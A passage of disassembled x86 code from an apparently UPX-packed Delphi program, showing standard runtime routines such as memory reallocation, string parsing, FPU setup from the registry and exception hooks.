call sub_401224 ; RtlLeaveCriticalSection
locret_4022AD: ; CODE XREF: sub_40211C+185�j
retn
; ---------------------------------------------------------------------------
loc_4022AE: ; DATA XREF: sub_40211C+3B�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_40229A
; ---------------------------------------------------------------------------
loc_4022B5: ; CODE XREF: sub_40211C+33�j
; sub_40211C+10F�j
; DATA XREF: ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn
sub_40211C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4022C0 proc near ; CODE XREF: sub_402490+4C�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF8h
mov esi, edx
add esi, 7
and esi, 0FFFFFFFCh
cmp esi, 0Ch
jge short loc_4022D9
mov esi, 0Ch
loc_4022D9: ; CODE XREF: sub_4022C0+12�j
mov ebp, eax
sub ebp, 4
mov edi, [ebp+0]
and edi, 7FFFFFFCh
mov eax, ebp
add eax, edi
mov ebx, eax
cmp edi, esi
jl loc_402378
mov edx, edi
sub edx, esi
mov [esp+18h+var_18], edx
cmp ebx, dword_40C48C
jnz short loc_40233C
mov eax, [esp+18h+var_18]
sub dword_40C48C, eax
mov eax, [esp+18h+var_18]
add dword_40C488, eax
cmp dword_40C488, 0Ch
jge loc_40246F
mov eax, [esp+18h+var_18]
add dword_40C48C, eax
mov eax, [esp+18h+var_18]
sub dword_40C488, eax
mov esi, edi
jmp loc_40246F
; ---------------------------------------------------------------------------
loc_40233C: ; CODE XREF: sub_4022C0+42�j
mov ebx, eax
test byte ptr [ebx], 2
jnz short loc_402350
mov eax, ebx
mov edx, [eax+8]
add [esp+18h+var_18], edx
call sub_401A64
loc_402350: ; CODE XREF: sub_4022C0+81�j
cmp [esp+18h+var_18], 0Ch
jl short loc_402371
mov ebx, ebp
add ebx, esi
mov eax, [esp+18h+var_18]
or eax, 2
mov [ebx], eax
mov eax, ebx
add eax, 4
call sub_401B28
jmp loc_40246F
; ---------------------------------------------------------------------------
loc_402371: ; CODE XREF: sub_4022C0+94�j
mov esi, edi
jmp loc_40246F
; ---------------------------------------------------------------------------
loc_402378: ; CODE XREF: sub_4022C0+2F�j
; sub_4022C0+1A6�j
mov eax, esi
sub eax, edi
mov [esp+18h+var_14], eax
cmp ebx, dword_40C48C
jnz short loc_4023EF
mov eax, dword_40C488
cmp eax, [esp+18h+var_14]
jl short loc_4023E6
mov eax, [esp+18h+var_14]
sub dword_40C488, eax
mov eax, [esp+18h+var_14]
add dword_40C48C, eax
cmp dword_40C488, 0Ch
jge short loc_4023C8
mov eax, dword_40C488
add dword_40C48C, eax
add esi, dword_40C488
xor eax, eax
mov dword_40C488, eax
loc_4023C8: ; CODE XREF: sub_4022C0+EE�j
mov eax, esi
sub eax, edi
add dword_40C428, eax
mov eax, [ebp+0]
and eax, 80000003h
or esi, eax
mov [ebp+0], esi
mov al, 1
jmp loc_402488
; ---------------------------------------------------------------------------
loc_4023E6: ; CODE XREF: sub_4022C0+D1�j
call sub_401D3C
mov ebx, ebp
add ebx, edi
loc_4023EF: ; CODE XREF: sub_4022C0+C6�j
test byte ptr [ebx], 2
jnz short loc_402441
mov edx, ebx
mov eax, edx
mov ecx, [eax+8]
mov [esp+18h+var_18], ecx
mov ecx, [esp+18h+var_18]
cmp ecx, [esp+18h+var_14]
jge short loc_402415
add edx, [esp+18h+var_18]
mov ebx, edx
mov eax, [esp+18h+var_18]
sub [esp+18h+var_14], eax
jmp short loc_402441
; ---------------------------------------------------------------------------
loc_402415: ; CODE XREF: sub_4022C0+145�j
call sub_401A64
mov eax, [esp+18h+var_14]
sub [esp+18h+var_18], eax
cmp [esp+18h+var_18], 0Ch
jl short loc_402435
mov eax, ebp
add eax, esi
mov edx, [esp+18h+var_18]
call sub_401CB4
jmp short loc_40246F
; ---------------------------------------------------------------------------
loc_402435: ; CODE XREF: sub_4022C0+165�j
add esi, [esp+18h+var_18]
mov ebx, ebp
add ebx, esi
and dword ptr [ebx], 0FFFFFFFEh
jmp short loc_40246F
; ---------------------------------------------------------------------------
loc_402441: ; CODE XREF: sub_4022C0+132�j
; sub_4022C0+153�j
mov eax, [ebx]
test eax, 80000000h
jz short loc_40246B
and eax, 7FFFFFFCh
add eax, ebx
mov ebx, eax
mov edx, [esp+18h+var_14]
mov eax, ebx
call sub_401E40
test al, al
jz short loc_40246B
mov ebx, ebp
add ebx, edi
jmp loc_402378
; ---------------------------------------------------------------------------
loc_40246B: ; CODE XREF: sub_4022C0+188�j
; sub_4022C0+1A0�j
xor eax, eax
jmp short loc_402488
; ---------------------------------------------------------------------------
loc_40246F: ; CODE XREF: sub_4022C0+5D�j
; sub_4022C0+77�j ...
mov eax, esi
sub eax, edi
add dword_40C428, eax
mov eax, [ebp+0]
and eax, 80000003h
or esi, eax
mov [ebp+0], esi
mov al, 1
loc_402488: ; CODE XREF: sub_4022C0+121�j
; sub_4022C0+1AD�j
pop ecx
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4022C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402490 proc near ; CODE XREF: sub_402584+D�p
; DATA XREF: UPX0:off_40B028�o
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov esi, edx
mov ebx, eax
cmp byte_40C430, 0
jnz short loc_4024B7
call sub_4018C0
test al, al
jnz short loc_4024B7
xor eax, eax
mov [ebp+var_4], eax
jmp loc_402548
; ---------------------------------------------------------------------------
loc_4024B7: ; CODE XREF: sub_402490+12�j
; sub_402490+1B�j
xor edx, edx
push ebp
push offset loc_402541
push dword ptr fs:[edx]
mov fs:[edx], esp
cmp byte_40C049, 0
jz short loc_4024D8
push offset dword_40C438
call sub_40121C ; RtlEnterCriticalSection
loc_4024D8: ; CODE XREF: sub_402490+3C�j
mov edx, esi
mov eax, ebx
call sub_4022C0
test al, al
jz short loc_4024EA
mov [ebp+var_4], ebx
jmp short loc_402520
; ---------------------------------------------------------------------------
loc_4024EA: ; CODE XREF: sub_402490+53�j
mov eax, esi
call sub_401F94
mov edi, eax
mov eax, ebx
sub eax, 4
mov eax, [eax]
and eax, 7FFFFFFCh
sub eax, 4
cmp esi, eax
jge short loc_402508
mov eax, esi
loc_402508: ; CODE XREF: sub_402490+74�j
test edi, edi
jz short loc_40251D
mov edx, edi
mov ecx, ebx
xchg eax, ecx
call sub_402660
mov eax, ebx
call sub_40211C
loc_40251D: ; CODE XREF: sub_402490+7A�j
mov [ebp+var_4], edi
loc_402520: ; CODE XREF: sub_402490+58�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_402548
loc_40252D: ; CODE XREF: sub_402490+B6�j
cmp byte_40C049, 0
jz short locret_402540
push offset dword_40C438
call sub_401224 ; RtlLeaveCriticalSection
locret_402540: ; CODE XREF: sub_402490+A4�j
retn
; ---------------------------------------------------------------------------
loc_402541: ; DATA XREF: sub_402490+2A�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_40252D
; ---------------------------------------------------------------------------
loc_402548: ; CODE XREF: sub_402490+22�j
; DATA XREF: sub_402490+98�o
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn
sub_402490 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402554 proc near ; CODE XREF: sub_4028A8+4�p
; sub_40328C+8�p ...
test eax, eax
jz short locret_402562
call off_40B020
or eax, eax
jz short loc_402563
locret_402562: ; CODE XREF: sub_402554+2�j
retn
; ---------------------------------------------------------------------------
loc_402563: ; CODE XREF: sub_402554+C�j
mov al, 1
jmp sub_4025D4
sub_402554 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40256C proc near ; CODE XREF: sub_4028BC+1D�p
; sub_4031C8+1C�p ...
test eax, eax
jz short locret_40257A
call off_40B024
or eax, eax
jnz short loc_40257B
locret_40257A: ; CODE XREF: sub_40256C+2�j
retn
; ---------------------------------------------------------------------------
loc_40257B: ; CODE XREF: sub_40256C+C�j
mov al, 2
jmp sub_4025D4
sub_40256C endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402584 proc near ; CODE XREF: sub_403624+22�p
; sub_4040B0+B9�p
mov ecx, [eax]
test ecx, ecx
jz short loc_4025BC
test edx, edx
jz short loc_4025A6
push eax
mov eax, ecx
call off_40B028
pop ecx
or eax, eax
jz short loc_4025B5
mov [ecx], eax
retn
; ---------------------------------------------------------------------------
loc_40259F: ; CODE XREF: sub_402584+2E�j
mov al, 2
jmp sub_4025D4
; ---------------------------------------------------------------------------
loc_4025A6: ; CODE XREF: sub_402584+8�j
mov [eax], edx
mov eax, ecx
call off_40B024
or eax, eax
jnz short loc_40259F
retn
; ---------------------------------------------------------------------------
loc_4025B5: ; CODE XREF: sub_402584+16�j
; sub_402584+48�j
mov al, 1
jmp sub_4025D4
; ---------------------------------------------------------------------------
loc_4025BC: ; CODE XREF: sub_402584+4�j
test edx, edx
jz short locret_4025D0
push eax
mov eax, edx
call off_40B020
pop ecx
or eax, eax
jz short loc_4025B5
mov [ecx], eax
locret_4025D0: ; CODE XREF: sub_402584+3A�j
retn
sub_402584 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4025D4 proc near ; CODE XREF: sub_402554+11�j
; sub_40256C+11�j ...
and eax, 7Fh
mov ecx, off_40C004
test ecx, ecx
jz short loc_4025E4
pop edx
call ecx ; sub_407B84
loc_4025E4: ; CODE XREF: sub_4025D4+B�j
dec eax
mov al, byte_4025FD[eax]
jns short loc_4025F8
call sub_405564
mov eax, [eax+4]
loc_4025F8: ; CODE XREF: sub_4025D4+17�j
jmp sub_4031BC
sub_4025D4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
byte_4025FD db 0CBh ; DATA XREF: sub_4025D4+11�r
aRsu db '',0
db 0E4h
dd 0C08BC3E5h
; =============== S U B R O U T I N E =======================================
sub_402618 proc near ; CODE XREF: sub_40788C+31�p
; sub_40A5A0+AC�p ...
push eax
push edx
push ecx
call sub_405564
cmp dword ptr [eax+4], 0
pop ecx
pop edx
pop eax
jnz short loc_40262D
retn
; ---------------------------------------------------------------------------
loc_40262D: ; CODE XREF: sub_402618+12�j
xor eax, eax
jmp sub_4025D4
sub_402618 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402638 proc near ; CODE XREF: UPX0:loc_404A98�j
; sub_404D83:loc_404ABD�j ...
push eax
call sub_405564
pop dword ptr [eax+4]
retn
sub_402638 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402648 proc near ; CODE XREF: sub_407B04+7�p
; sub_40A5A0+5D�p ...
call sub_405564
xor edx, edx
mov ecx, [eax+4]
mov [eax+4], edx
mov eax, ecx
retn
sub_402648 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402660 proc near ; CODE XREF: sub_402490+81�p
; sub_40321C+1B�p ...
push esi
push edi
mov esi, eax
mov edi, edx
mov eax, ecx
cmp edi, esi
ja short loc_40267F
jz short loc_40269D
sar ecx, 2
js short loc_40269D
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_40267F: ; CODE XREF: sub_402660+A�j
lea esi, [esi+ecx-4]
lea edi, [edi+ecx-4]
sar ecx, 2
js short loc_40269D
std
rep movsd
mov ecx, eax
and ecx, 3
add esi, 3
add edi, 3
rep movsb
cld
loc_40269D: ; CODE XREF: sub_402660+C�j
; sub_402660+11�j ...
pop edi
pop esi
retn
sub_402660 endp
; =============== S U B R O U T I N E =======================================
sub_4026A0 proc near ; CODE XREF: sub_4040B0+EF�p
; sub_4040B0+143�p ...
push edi
mov edi, eax
mov ch, cl
mov eax, ecx
shl eax, 10h
mov ax, cx
mov ecx, edx
sar ecx, 2
js short loc_4026BD
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_4026BD: ; CODE XREF: sub_4026A0+12�j
pop edi
retn
sub_4026A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4026C0 proc near ; CODE XREF: sub_406508+6�p
push ebx
push esi
push edi
mov esi, eax
push eax
test eax, eax
jz short loc_40273D
xor eax, eax
xor ebx, ebx
mov edi, 0CCCCCCCh
loc_4026D3: ; CODE XREF: sub_4026C0+19�j
mov bl, [esi]
inc esi
cmp bl, 20h
jz short loc_4026D3
mov ch, 0
cmp bl, 2Dh
jz short loc_40274B
cmp bl, 2Bh
jz short loc_40274D
cmp bl, 24h
jz short loc_402752
cmp bl, 78h
jz short loc_402752
cmp bl, 58h
jz short loc_402752
cmp bl, 30h
jnz short loc_40270E
mov bl, [esi]
inc esi
cmp bl, 78h
jz short loc_402752
cmp bl, 58h
jz short loc_402752
test bl, bl
jz short loc_40272C
jmp short loc_402712
; ---------------------------------------------------------------------------
loc_40270E: ; CODE XREF: sub_4026C0+39�j
; sub_4026C0+90�j
test bl, bl
jz short loc_402746
loc_402712: ; CODE XREF: sub_4026C0+4C�j
; sub_4026C0+6A�j
sub bl, 30h
cmp bl, 9
ja short loc_402746
cmp eax, edi
ja short loc_402746
lea eax, [eax+eax*4]
add eax, eax
add eax, ebx
mov bl, [esi]
inc esi
test bl, bl
jnz short loc_402712
loc_40272C: ; CODE XREF: sub_4026C0+4A�j
dec ch
jz short loc_402740
test eax, eax
jl short loc_402746
loc_402734: ; CODE XREF: sub_4026C0+82�j
; sub_4026C0+84�j ...
pop ecx
xor esi, esi
loc_402737: ; CODE XREF: sub_4026C0+89�j
mov [edx], esi
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40273D: ; CODE XREF: sub_4026C0+8�j
; sub_4026C0+9C�j
inc esi
jmp short loc_402746
; ---------------------------------------------------------------------------
loc_402740: ; CODE XREF: sub_4026C0+6E�j
neg eax
jle short loc_402734
js short loc_402734
loc_402746: ; CODE XREF: sub_4026C0+50�j
; sub_4026C0+58�j ...
pop ebx
sub esi, ebx
jmp short loc_402737
; ---------------------------------------------------------------------------
loc_40274B: ; CODE XREF: sub_4026C0+20�j
inc ch
loc_40274D: ; CODE XREF: sub_4026C0+25�j
mov bl, [esi]
inc esi
jmp short loc_40270E
; ---------------------------------------------------------------------------
loc_402752: ; CODE XREF: sub_4026C0+2A�j
; sub_4026C0+2F�j ...
mov edi, 0FFFFFFFh
mov bl, [esi]
inc esi
test bl, bl
jz short loc_40273D
loc_40275E: ; CODE XREF: sub_4026C0+C7�j
cmp bl, 61h
jb short loc_402766
sub bl, 20h
loc_402766: ; CODE XREF: sub_4026C0+A1�j
sub bl, 30h
cmp bl, 9
jbe short loc_402779
sub bl, 11h
cmp bl, 5
ja short loc_402746
add bl, 0Ah
loc_402779: ; CODE XREF: sub_4026C0+AC�j
cmp eax, edi
ja short loc_402746
shl eax, 4
add eax, ebx
mov bl, [esi]
inc esi
test bl, bl
jnz short loc_40275E
jmp short loc_402734
sub_4026C0 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40278C proc near ; CODE XREF: sub_402794+5�p
; sub_402794+11�p
jmp ds:dword_40D194
sub_40278C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402794 proc near ; CODE XREF: UPX0:0040547F�p
push ebx
xor ebx, ebx
push 0
call sub_40278C ; GetKeyboardType
cmp eax, 7
jnz short loc_4027BF
push 1
call sub_40278C ; GetKeyboardType
and eax, 0FF00h
cmp eax, 0D00h
jz short loc_4027BD
cmp eax, 400h
jnz short loc_4027BF
loc_4027BD: ; CODE XREF: sub_402794+20�j
mov bl, 1
loc_4027BF: ; CODE XREF: sub_402794+D�j
; sub_402794+27�j
mov eax, ebx
pop ebx
retn
sub_402794 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4027C4 proc near ; CODE XREF: UPX0:00405488�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
movzx eax, word_40B000
mov [ebp+var_8], eax
lea eax, [ebp+var_4]
push eax
push 1
push 0
push offset aSoftwareBorlan ; "SOFTWARE\\Borland\\Delphi\\RTL"
push 80000002h
call sub_401178 ; RegOpenKeyExA
test eax, eax
jnz short loc_40283C
xor eax, eax
push ebp
push offset loc_402835
push dword ptr fs:[eax]
mov fs:[eax], esp
mov [ebp+var_C], 4
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
push 0
push 0
push offset aFpumaskvalue ; "FPUMaskValue"
mov eax, [ebp+var_4]
push eax
call sub_401180 ; RegQueryValueExA
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40283C
loc_40282B: ; CODE XREF: sub_4027C4+76�j
mov eax, [ebp+var_4]
push eax
call sub_401170 ; RegCloseKey
retn
; ---------------------------------------------------------------------------
loc_402835: ; DATA XREF: sub_4027C4+2E�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_40282B
; ---------------------------------------------------------------------------
loc_40283C: ; CODE XREF: sub_4027C4+29�j
; DATA XREF: sub_4027C4+62�o
mov ax, word_40B000
and ax, 0FFC0h
mov dx, word ptr [ebp+var_8]
and dx, 3Fh
or ax, dx
mov word_40B000, ax
mov esp, ebp
pop ebp
retn
sub_4027C4 endp
; ---------------------------------------------------------------------------
align 4
aSoftwareBorlan db 'SOFTWARE\Borland\Delphi\RTL',0 ; DATA XREF: sub_4027C4+18�o
aFpumaskvalue db 'FPUMaskValue',0 ; DATA XREF: sub_4027C4+4C�o
align 4
; =============== S U B R O U T I N E =======================================
sub_402888 proc near ; CODE XREF: sub_402B34+20�p
; UPX0:00402E2A�p ...
fninit
wait
fldcw word_40B000
retn
sub_402888 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402894 proc near ; CODE XREF: sub_407704+FF�p
push esi
push edi
mov edi, edx
mov esi, [eax-2Ch]
xor ecx, ecx
mov cl, [esi]
inc ecx
rep movsb
pop edi
pop esi
retn
sub_402894 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4028A8 proc near ; DATA XREF: UPX0:0040105C�o
push eax
mov eax, [eax-28h]
call sub_402554
mov edx, eax
pop eax
jmp sub_402900
sub_4028A8 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4028BC proc near ; CODE XREF: UPX0:00407ADE�p
; DATA XREF: UPX0:00401060�o
push ebx
push esi
mov ebx, eax
mov esi, eax
loc_4028C2: ; CODE XREF: sub_4028BC+1B�j
mov esi, [esi]
mov edx, [esi-40h]
mov esi, [esi-24h]
test edx, edx
jz short loc_4028D5
call sub_403850
mov eax, ebx
loc_4028D5: ; CODE XREF: sub_4028BC+10�j
test esi, esi
jnz short loc_4028C2
call sub_40256C
pop esi
pop ebx
retn
sub_4028BC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4028E4 proc near ; DATA XREF: UPX0:00401064�o
call sub_402A3C
test dl, dl
jle short locret_4028F2
call sub_402A2C
locret_4028F2: ; CODE XREF: sub_4028E4+7�j
retn
sub_4028E4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4028F4 proc near ; CODE XREF: sub_402B34+11E�j
; sub_402CB4+30�p ...
test eax, eax
jz short locret_4028FF
mov ecx, [eax]
mov dl, 1
call dword ptr [ecx-4]
locret_4028FF: ; CODE XREF: sub_4028F4+2�j
retn
sub_4028F4 endp
; =============== S U B R O U T I N E =======================================
sub_402900 proc near ; CODE XREF: sub_4028A8+C�j
push ebx
push esi
push edi
mov ebx, eax
mov edi, edx
stosd
mov ecx, [ebx-28h]
xor eax, eax
push ecx
shr ecx, 2
dec ecx
rep stosd
pop ecx
and ecx, 3
rep stosb
mov eax, edx
mov edx, esp
loc_40291E: ; CODE XREF: sub_402900+2F�j
mov ecx, [ebx-48h]
test ecx, ecx
jz short loc_402926
push ecx
loc_402926: ; CODE XREF: sub_402900+23�j
mov ebx, [ebx-24h]
test ebx, ebx
jz short loc_402931
mov ebx, [ebx]
jmp short loc_40291E
; ---------------------------------------------------------------------------
loc_402931: ; CODE XREF: sub_402900+2B�j
cmp esp, edx
jz short loc_402952
loc_402935: ; CODE XREF: sub_402900+50�j
pop ebx
mov ecx, [ebx]
add ebx, 4
loc_40293B: ; CODE XREF: sub_402900+4C�j
mov esi, [ebx+10h]
test esi, esi
jz short loc_402948
mov edi, [ebx+14h]
mov [eax+edi], esi
loc_402948: ; CODE XREF: sub_402900+40�j
add ebx, 1Ch
dec ecx
jnz short loc_40293B
cmp esp, edx
jnz short loc_402935
loc_402952: ; CODE XREF: sub_402900+33�j
pop edi
pop esi
pop ebx
retn
sub_402900 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402958 proc near ; CODE XREF: sub_407704+A8�p
; sub_407F2C+96�p
test eax, eax
jz short locret_40296C
loc_40295C: ; CODE XREF: sub_402958+F�j
mov eax, [eax]
cmp eax, edx
jz short loc_40296A
mov eax, [eax-24h]
test eax, eax
jnz short loc_40295C
retn
; ---------------------------------------------------------------------------
loc_40296A: ; CODE XREF: sub_402958+8�j
mov al, 1
locret_40296C: ; CODE XREF: sub_402958+2�j
retn
sub_402958 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402970 proc near ; CODE XREF: sub_4029B4+13�p
push edi
xchg eax, ebx
jmp short loc_402976
; ---------------------------------------------------------------------------
loc_402974: ; CODE XREF: sub_402970+1F�j
mov ebx, [ebx]
loc_402976: ; CODE XREF: sub_402970+2�j
mov edi, [ebx-30h]
test edi, edi
jz short loc_40298A
movzx ecx, word ptr [edi]
push ecx
add edi, 2
repne scasw
jz short loc_402993
pop ecx
loc_40298A: ; CODE XREF: sub_402970+B�j
mov ebx, [ebx-24h]
test ebx, ebx
jnz short loc_402974
pop edi
retn
; ---------------------------------------------------------------------------
loc_402993: ; CODE XREF: sub_402970+17�j
pop eax
add eax, eax
sub eax, ecx
mov ebx, [edi+eax*2-4]
pop edi
retn
sub_402970 endp
; ---------------------------------------------------------------------------
align 10h
loc_4029A0: ; DATA XREF: UPX0:00401048�o
mov eax, 8000FFFFh
retn
; ---------------------------------------------------------------------------
align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_4. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_3. PRESS KEYPAD "+" TO EXPAND]
align 4
; =============== S U B R O U T I N E =======================================
sub_4029B4 proc near ; DATA XREF: UPX0:00401054�o
push ebx
mov bx, [edx]
or bx, bx
jz short loc_4029D4
cmp bx, 0C000h
jnb short loc_4029D4
push eax
mov eax, [eax]
call sub_402970
pop eax
jz short loc_4029D4
mov ecx, ebx
pop ebx
jmp ecx
; ---------------------------------------------------------------------------
loc_4029D4: ; CODE XREF: sub_4029B4+7�j
; sub_4029B4+E�j ...
pop ebx
mov ecx, [eax]
jmp dword ptr [ecx-10h]
sub_4029B4 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4029DC proc near ; CODE XREF: sub_407904+A�p
; sub_407940+F�p ...
arg_0 = byte ptr 4
push edx
push ecx
push ebx
test dl, dl
jl short loc_4029E6
call dword ptr [eax-0Ch]
loc_4029E6: ; CODE XREF: sub_4029DC+5�j
xor edx, edx
lea ecx, [esp+0Ch+arg_0]
mov ebx, fs:[edx]
mov [ecx], ebx
mov [ecx+8], ebp
mov dword ptr [ecx+4], offset sub_402A05
mov [ecx+0Ch], eax
mov fs:[edx], ecx
pop ebx
pop ecx
pop edx
retn
sub_4029DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402A05 proc near ; DATA XREF: sub_4029DC+18�o
jmp sub_402B34
sub_402A05 endp
; ---------------------------------------------------------------------------
mov eax, [esp+2Ch]
mov eax, [eax+0Ch]
test eax, eax
jz short loc_402A23
mov ecx, [eax]
mov dl, 81h
push eax
call dword ptr [ecx-4]
pop eax
call sub_402A2C
loc_402A23: ; CODE XREF: UPX0:00402A13�j
call sub_402CB4
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402A2C proc near ; CODE XREF: sub_4028E4+9�p
; UPX0:00402A1E�p
mov edx, [eax]
call dword ptr [edx-8]
retn
sub_402A2C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402A34 proc near ; CODE XREF: sub_407904+25�p
; sub_407940+67�p ...
push eax
mov edx, [eax]
call dword ptr [edx-1Ch]
pop eax
retn
sub_402A34 endp
; =============== S U B R O U T I N E =======================================
sub_402A3C proc near ; CODE XREF: sub_4028E4�p
test dl, dl
jg short loc_402A41
retn
; ---------------------------------------------------------------------------
loc_402A41: ; CODE XREF: sub_402A3C+2�j
push eax
push edx
mov edx, [eax]
call dword ptr [edx-18h]
pop edx
pop eax
retn
sub_402A3C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402A4C proc near ; CODE XREF: sub_402CB4+35�p
cmp byte_40B004, 1
jbe short locret_402A65
push 0
push 0
push 0
push 0EEDFADFh
call sub_401098 ; RaiseException
locret_402A65: ; CODE XREF: sub_402A4C+7�j
retn
sub_402A4C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402A68 proc near ; CODE XREF: sub_402B34+4D�p
cmp byte_40B004, 0
jz short locret_402A87
push eax
push eax
push edx
push esp
push 2
push 0
push 0EEDFAE4h
call sub_401098 ; RaiseException
add esp, 8
pop eax
locret_402A87: ; CODE XREF: sub_402A68+7�j
retn
sub_402A68 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_402A9C
loc_402A88: ; CODE XREF: sub_402A9C+B�j
push esp
push 1
push 0
push 0EEDFAE0h
call sub_401098 ; RaiseException
add esp, 4
pop eax
retn
; END OF FUNCTION CHUNK FOR sub_402A9C
; =============== S U B R O U T I N E =======================================
sub_402A9C proc near ; CODE XREF: sub_402B34+FC�p
; FUNCTION CHUNK AT 00402A88 SIZE 00000014 BYTES
cmp byte_40B004, 1
jbe short locret_402AAC
push eax
push ebx
jmp loc_402A88
; ---------------------------------------------------------------------------
locret_402AAC: ; CODE XREF: sub_402A9C+7�j
retn
sub_402A9C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402AB0 proc near ; CODE XREF: sub_402AD0+C�p
test ecx, ecx
jz short locret_402ACD
mov eax, [ecx+1]
cmp byte ptr [ecx], 0E9h
jz short loc_402AC8
cmp byte ptr [ecx], 0EBh
jnz short locret_402ACD
movsx eax, al
inc ecx
inc ecx
jmp short loc_402ACB
; ---------------------------------------------------------------------------
loc_402AC8: ; CODE XREF: sub_402AB0+A�j
add ecx, 5
loc_402ACB: ; CODE XREF: sub_402AB0+16�j
add ecx, eax
locret_402ACD: ; CODE XREF: sub_402AB0+2�j
; sub_402AB0+F�j
retn
sub_402AB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402AD0 proc near ; CODE XREF: sub_409BA8-6F23�p
cmp byte_40B004, 1
jbe short locret_402AF5
push eax
push edx
push ecx
call sub_402AB0
push ecx
push esp
push 1
push 0
push 0EEDFAE1h
call sub_401098 ; RaiseException
pop ecx
pop ecx
pop edx
pop eax
locret_402AF5: ; CODE XREF: sub_402AD0+7�j
retn
sub_402AD0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402AF8 proc near ; CODE XREF: sub_402D08+28�p
cmp byte_40B004, 1
jbe short locret_402B12
push edx
push esp
push 1
push 0
push 0EEDFAE2h
call sub_401098 ; RaiseException
pop edx
locret_402B12: ; CODE XREF: sub_402AF8+7�j
retn
sub_402AF8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402B14 proc near ; CODE XREF: UPX0:loc_402E70�p
push eax
push edx
cmp byte_40B004, 1
jbe short loc_402B2E
push esp
push 2
push 0
push 0EEDFAE3h
call sub_401098 ; RaiseException
loc_402B2E: ; CODE XREF: sub_402B14+9�j
pop edx
pop eax
retn
sub_402B14 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402B34 proc near ; CODE XREF: sub_402A05�j
; sub_402EE0:loc_402F26�j ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_24 = dword ptr 28h
mov eax, [esp+arg_0]
test dword ptr [eax+4], 6
jnz loc_402C57
cmp dword ptr [eax], 0EEDFADEh
mov edx, [eax+18h]
mov ecx, [eax+14h]
jz short loc_402BC1
cld
call sub_402888
mov edx, off_40C00C
test edx, edx
jz loc_402C57
call edx ; sub_407F2C
test eax, eax
